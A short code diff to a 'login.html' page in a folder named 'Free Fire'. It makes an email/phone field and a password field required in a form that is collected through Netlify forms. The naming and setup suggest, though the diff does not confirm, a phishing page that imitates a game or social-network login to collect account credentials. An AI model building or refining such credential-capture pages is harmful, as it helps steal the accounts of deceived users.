--- a/Free Fire/login.html
+++ b/Free Fire/login.html
@@ -19,10 +19,10 @@
     <form action="" method="POST" netlify>
       <div class="input-container">
         <div class="input">
-          <input type="text" placeholder="Email address and phone number">
+          <input type="text" placeholder="Email address and phone number" required>
         </div>
         <div class="input">
-          <input type="password" placeholder="Password">
+          <input type="password" placeholder="Password" required>
         </div>
       </div>
       <button class="login-button">Log In</button>
